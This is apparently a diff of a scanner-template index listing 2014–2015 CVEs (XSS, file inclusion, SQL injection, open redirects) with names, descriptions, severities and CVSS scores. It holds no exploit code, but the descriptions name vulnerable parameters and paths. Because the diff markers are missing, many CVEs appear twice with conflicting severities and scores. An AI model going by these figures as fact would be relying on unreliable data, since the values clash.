{"ID":"CVE-2014-9444","Info":{"Name":"Frontend Uploader \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2014/CVE-2014-9444.yaml"}
{"ID":"CVE-2014-9606","Info":{"Name":"Netsweeper 4.0.8 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-9606.yaml"}
{"ID":"CVE-2014-9607","Info":{"Name":"Netsweeper 4.0.4 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-9607.yaml"}
{"ID":"CVE-2014-9608","Info":{"Name":"Netsweeper 4.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-9608.yaml"}
@ -254,44 +254,44 @@
{"ID":"CVE-2014-9615","Info":{"Name":"Netsweeper 4.0.4 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-9615.yaml"}
{"ID":"CVE-2014-9617","Info":{"Name":"Netsweeper 3.0.6 - Open Redirection","Severity":"medium","Description":"An open redirect vulnerability in remotereporter/load_logfiles.php in Netsweeper before 4.0.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-9617.yaml"}
{"ID":"CVE-2014-9618","Info":{"Name":"Netsweeper - Authentication Bypass","Severity":"critical","Description":"The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2014/CVE-2014-9618.yaml"}
{"ID":"CVE-2015-0554","Info":{"Name":"ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure","Severity":"high","Description":"ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-0554.yaml"}
{"ID":"CVE-2015-0554","Info":{"Name":"ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure","Severity":"critical","Description":"ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.","Classification":{"CVSSScore":"9.4"}},"file_path":"http/cves/2015/CVE-2015-0554.yaml"}
{"ID":"CVE-2015-1000005","Info":{"Name":"WordPress Candidate Application Form \u003c= 1.3 - Local File Inclusion","Severity":"high","Description":"WordPress Candidate Application Form \u003c= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1000005.yaml"}
{"ID":"CVE-2015-1000010","Info":{"Name":"WordPress Simple Image Manipulator \u003c 1.0 - Local File Inclusion","Severity":"high","Description":"WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1000010.yaml"}
{"ID":"CVE-2015-1000012","Info":{"Name":"WordPress MyPixs \u003c=0.3 - Local File Inclusion","Severity":"high","Description":"WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1000012.yaml"}
{"ID":"CVE-2015-1427","Info":{"Name":"ElasticSearch - Remote Code Execution","Severity":"critical","Description":"ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2015/CVE-2015-1427.yaml"}
{"ID":"CVE-2015-1427","Info":{"Name":"ElasticSearch - Remote Code Execution","Severity":"high","Description":"ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1427.yaml"}
{"ID":"CVE-2015-1503","Info":{"Name":"IceWarp Mail Server \u003c11.1.1 - Directory Traversal","Severity":"high","Description":"IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1503.yaml"}
{"ID":"CVE-2015-1579","Info":{"Name":"WordPress Slider Revolution - Local File Disclosure","Severity":"high","Description":"Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1579.yaml"}
{"ID":"CVE-2015-1579","Info":{"Name":"WordPress Slider Revolution - Local File Disclosure","Severity":"medium","Description":"Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-1579.yaml"}
{"ID":"CVE-2015-1880","Info":{"Name":"Fortinet FortiOS \u003c=5.2.3 - Cross-Site Scripting","Severity":"medium","Description":"Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-1880.yaml"}
{"ID":"CVE-2015-2067","Info":{"Name":"Magento Server MAGMI - Directory Traversal","Severity":"high","Description":"Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2067.yaml"}
{"ID":"CVE-2015-2067","Info":{"Name":"Magento Server MAGMI - Directory Traversal","Severity":"medium","Description":"Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2067.yaml"}
{"ID":"CVE-2015-2068","Info":{"Name":"Magento Server Mass Importer - Cross-Site Scripting","Severity":"medium","Description":"Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2068.yaml"}
{"ID":"CVE-2015-2080","Info":{"Name":"Eclipse Jetty \u003c9.2.9.v20150224 - Sensitive Information Leakage","Severity":"high","Description":"Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-2080.yaml"}
{"ID":"CVE-2015-2166","Info":{"Name":"Ericsson Drutt MSDP - Local File Inclusion","Severity":"high","Description":"Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2166.yaml"}
{"ID":"CVE-2015-2196","Info":{"Name":"WordPress Spider Calendar \u003c=1.4.9 - SQL Injection","Severity":"critical","Description":"WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-2196.yaml"}
{"ID":"CVE-2015-2755","Info":{"Name":"WordPress AB Google Map Travel \u003c=3.4 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-2755.yaml"}
{"ID":"CVE-2015-2166","Info":{"Name":"Ericsson Drutt MSDP - Local File Inclusion","Severity":"medium","Description":"Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2166.yaml"}
{"ID":"CVE-2015-2196","Info":{"Name":"WordPress Spider Calendar \u003c=1.4.9 - SQL Injection","Severity":"high","Description":"WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-2196.yaml"}
{"ID":"CVE-2015-2755","Info":{"Name":"WordPress AB Google Map Travel \u003c=3.4 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2015/CVE-2015-2755.yaml"}
{"ID":"CVE-2015-2807","Info":{"Name":"Navis DocumentCloud \u003c0.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2807.yaml"}
{"ID":"CVE-2015-2863","Info":{"Name":"Kaseya Virtual System Administrator - Open Redirect","Severity":"medium","Description":"Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-2863.yaml"}
{"ID":"CVE-2015-2996","Info":{"Name":"SysAid Help Desk \u003c15.2 - Local File Inclusion","Severity":"high","Description":"SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-2996.yaml"}
{"ID":"CVE-2015-3035","Info":{"Name":"TP-LINK - Local File Inclusion","Severity":"high","Description":"TP-LINK is susceptible to local file inclusion in these products: Archer C5 (1.2) with firmware before 150317, Archer C7 (2.0) with firmware before 150304, and C8 (1.0) with firmware before 150316, Archer C9 (1.0), TL-WDR3500 (1.0), TL-WDR3600 (1.0), and TL-WDR4300 (1.0) with firmware before 150302, TL-WR740N (5.0) and TL-WR741ND (5.0) with firmware before 150312, and TL-WR841N (9.0), TL-WR841N (10.0), TL-WR841ND (9.0), and TL-WR841ND (10.0) with firmware before 150310. Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2015/CVE-2015-3035.yaml"}
{"ID":"CVE-2015-3224","Info":{"Name":"Ruby on Rails Web Console - Remote Code Execution","Severity":"critical","Description":"Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-3224.yaml"}
{"ID":"CVE-2015-3337","Info":{"Name":"Elasticsearch - Local File Inclusion","Severity":"high","Description":"Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-3337.yaml"}
{"ID":"CVE-2015-2863","Info":{"Name":"Kaseya Virtual System Administrator - Open Redirect","Severity":"medium","Description":"Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2863.yaml"}
{"ID":"CVE-2015-2996","Info":{"Name":"SysAid Help Desk \u003c15.2 - Local File Inclusion","Severity":"high","Description":"SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2015/CVE-2015-2996.yaml"}
{"ID":"CVE-2015-3035","Info":{"Name":"TP-LINK - Local File Inclusion","Severity":"high","Description":"TP-LINK is susceptible to local file inclusion in these products: Archer C5 (1.2) with firmware before 150317, Archer C7 (2.0) with firmware before 150304, and C8 (1.0) with firmware before 150316, Archer C9 (1.0), TL-WDR3500 (1.0), TL-WDR3600 (1.0), and TL-WDR4300 (1.0) with firmware before 150302, TL-WR740N (5.0) and TL-WR741ND (5.0) with firmware before 150312, and TL-WR841N (9.0), TL-WR841N (10.0), TL-WR841ND (9.0), and TL-WR841ND (10.0) with firmware before 150310. Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.\n","Classification":{"CVSSScore":"7.8"}},"file_path":"http/cves/2015/CVE-2015-3035.yaml"}
{"ID":"CVE-2015-3224","Info":{"Name":"Ruby on Rails Web Console - Remote Code Execution","Severity":"medium","Description":"Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-3224.yaml"}
{"ID":"CVE-2015-3337","Info":{"Name":"Elasticsearch - Local File Inclusion","Severity":"medium","Description":"Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-3337.yaml"}
{"ID":"CVE-2015-3648","Info":{"Name":"ResourceSpace - Local File inclusion","Severity":"high","Description":"ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-3648.yaml"}
{"ID":"CVE-2015-3897","Info":{"Name":"Bonita BPM Portal \u003c6.5.3 - Local File Inclusion","Severity":"high","Description":"Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-3897.yaml"}
{"ID":"CVE-2015-4050","Info":{"Name":"Symfony - Authentication Bypass","Severity":"high","Description":"Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-4050.yaml"}
{"ID":"CVE-2015-4062","Info":{"Name":"WordPress NewStatPress 0.9.8 - SQL Injection","Severity":"critical","Description":"WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-4062.yaml"}
{"ID":"CVE-2015-4063","Info":{"Name":"NewStatPress \u003c0.9.9 - Cross-Site Scripting","Severity":"medium","Description":"WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2015/CVE-2015-4063.yaml"}
{"ID":"CVE-2015-3897","Info":{"Name":"Bonita BPM Portal \u003c6.5.3 - Local File Inclusion","Severity":"medium","Description":"Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-3897.yaml"}
{"ID":"CVE-2015-4050","Info":{"Name":"Symfony - Authentication Bypass","Severity":"medium","Description":"Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-4050.yaml"}
{"ID":"CVE-2015-4062","Info":{"Name":"WordPress NewStatPress 0.9.8 - SQL Injection","Severity":"medium","Description":"WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2015/CVE-2015-4062.yaml"}
{"ID":"CVE-2015-4063","Info":{"Name":"NewStatPress \u003c0.9.9 - Cross-Site Scripting","Severity":"low","Description":"WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"3.5"}},"file_path":"http/cves/2015/CVE-2015-4063.yaml"}
{"ID":"CVE-2015-4074","Info":{"Name":"Joomla! Helpdesk Pro plugin \u003c1.4.0 - Local File Inclusion","Severity":"high","Description":"Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-4074.yaml"}
{"ID":"CVE-2015-4127","Info":{"Name":"WordPress Church Admin \u003c0.810 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2015/CVE-2015-4127.yaml"}
{"ID":"CVE-2015-4414","Info":{"Name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","Severity":"high","Description":"WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-4414.yaml"}
{"ID":"CVE-2015-4127","Info":{"Name":"WordPress Church Admin \u003c0.810 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-4127.yaml"}
{"ID":"CVE-2015-4414","Info":{"Name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","Severity":"medium","Description":"WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-4414.yaml"}
{"ID":"CVE-2015-4632","Info":{"Name":"Koha 3.20.1 - Directory Traversal","Severity":"high","Description":"Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-4632.yaml"}
{"ID":"CVE-2015-4666","Info":{"Name":"Xceedium Xsuite \u003c=2.4.4.5 - Local File Inclusion","Severity":"high","Description":"Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-4666.yaml"}
{"ID":"CVE-2015-4666","Info":{"Name":"Xceedium Xsuite \u003c=2.4.4.5 - Local File Inclusion","Severity":"medium","Description":"Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-4666.yaml"}
{"ID":"CVE-2015-4668","Info":{"Name":"Xsuite \u003c=2.4.4.5 - Open Redirect","Severity":"medium","Description":"Xsuite 2.4.4.5 and prior contains an open redirect vulnerability, which can allow a remote attacker to redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the redirurl parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-4668.yaml"}
{"ID":"CVE-2015-4694","Info":{"Name":"WordPress Zip Attachments \u003c= 1.1.4 - Arbitrary File Retrieval","Severity":"high","Description":"WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2015/CVE-2015-4694.yaml"}
{"ID":"CVE-2015-5354","Info":{"Name":"Novius OS 5.0.1-elche - Open Redirect","Severity":"medium","Description":"Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-5354.yaml"}
{"ID":"CVE-2015-5354","Info":{"Name":"Novius OS 5.0.1-elche - Open Redirect","Severity":"medium","Description":"Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2015/CVE-2015-5354.yaml"}
{"ID":"CVE-2015-5461","Info":{"Name":"WordPress StageShow \u003c5.0.9 - Open Redirect","Severity":"medium","Description":"WordPress StageShow plugin before 5.0.9 contains an open redirect vulnerability in the Redirect function in stageshow_redirect.php. A remote attacker can redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the url parameter.","Classification":{"CVSSScore":"6.4"}},"file_path":"http/cves/2015/CVE-2015-5461.yaml"}
{"ID":"CVE-2015-5469","Info":{"Name":"WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion","Severity":"high","Description":"WordPress MDC YouTube Downloader 2.1.0 plugin is susceptible to local file inclusion. A remote attacker can read arbitrary files via a full pathname in the file parameter to includes/download.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-5469.yaml"}
{"ID":"CVE-2015-5471","Info":{"Name":"Swim Team \u003c= v1.44.10777 - Local File Inclusion","Severity":"medium","Description":"The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2015/CVE-2015-5471.yaml"}
{"ID":"CVE-2015-5531","Info":{"Name":"ElasticSearch \u003c1.6.1 - Local File Inclusion","Severity":"high","Description":"ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-5531.yaml"}
{"ID":"CVE-2015-5688","Info":{"Name":"Geddy \u003c13.0.8 - Local File Inclusion","Severity":"high","Description":"Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-5688.yaml"}
{"ID":"CVE-2015-5531","Info":{"Name":"ElasticSearch \u003c1.6.1 - Local File Inclusion","Severity":"medium","Description":"ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-5531.yaml"}
{"ID":"CVE-2015-5688","Info":{"Name":"Geddy \u003c13.0.8 - Local File Inclusion","Severity":"medium","Description":"Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-5688.yaml"}
{"ID":"CVE-2015-6477","Info":{"Name":"Nordex NC2 - Cross-Site Scripting","Severity":"medium","Description":"Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-6477.yaml"}
{"ID":"CVE-2015-6544","Info":{"Name":"Combodo iTop \u003c2.2.0-2459 - Cross-Site Scripting","Severity":"medium","Description":"Combodo iTop before 2.2.0-2459 contains a cross-site scripting vulnerability in application/dashboard.class.inc.php which allows remote attackers to inject arbitrary web script or HTML via a dashboard title.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-6544.yaml"}
{"ID":"CVE-2015-6920","Info":{"Name":"WordPress sourceAFRICA \u003c=0.1.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress sourceAFRICA plugin version 0.1.3 contains a cross-site scripting vulnerability.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-6920.yaml"}
@ -300,7 +300,7 @@
{"ID":"CVE-2015-7377","Info":{"Name":"WordPress Pie-Register \u003c2.0.19 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Pie Register before 2.0.19 contains a reflected cross-site scripting vulnerability in pie-register/pie-register.php which allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URL.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-7377.yaml"}
